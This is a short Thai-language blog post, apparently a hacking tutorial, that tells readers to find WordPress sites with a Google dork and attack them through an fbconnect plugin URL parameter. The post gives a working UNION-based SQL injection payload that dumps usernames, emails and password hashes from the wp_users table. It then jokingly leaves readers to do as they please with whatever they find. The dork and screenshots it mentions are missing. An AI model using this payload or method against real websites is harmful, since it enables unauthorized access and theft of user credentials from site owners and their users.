เอาล่ะเมื่อพอจะเข้าใจกันแล้วเรามาเริ่มกันเลยดีกว่าแต่เดียวก่อนอื่นเราต้องมี google dork กันก่อนน่ะครับ
Step 1 : เข้าไปที่
http://www.google.com
Step 2:เสร็จแล้วก็ทำการค้นหาด้วยคำนี้
Step 3: เสร็จแล้วเราก็เลือกเอาสักเว็บนึง เมื่อเราคลิกเข้าไปแล้วก็จะแสดงเหมือนดังรูปนี้
 |
| You will find something like that. |
Step 4: จากนั้นก็ทำการเปลี่ยนจาก
?fbconnect_action=myhome&userid=
เป็น
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass) ,7,8,9,10,11,12+from+wp_users--Step 5: จากนั้นสิ่งที่เราไม่อยากเห็นก้จะแสดงขึ้นมาตามรูปนี้เลยครับ
Step 6: ใครเจออะไรก้จัดการเอาเองน่ะตัวใครตัวมันฮ่าๆ
เอาล่ะครับใครไม่เข้าใจอันไหนก้คอมเม้นมาได้เลยน่ะครับยินดีตอบจร้า
No comments:
Post a Comment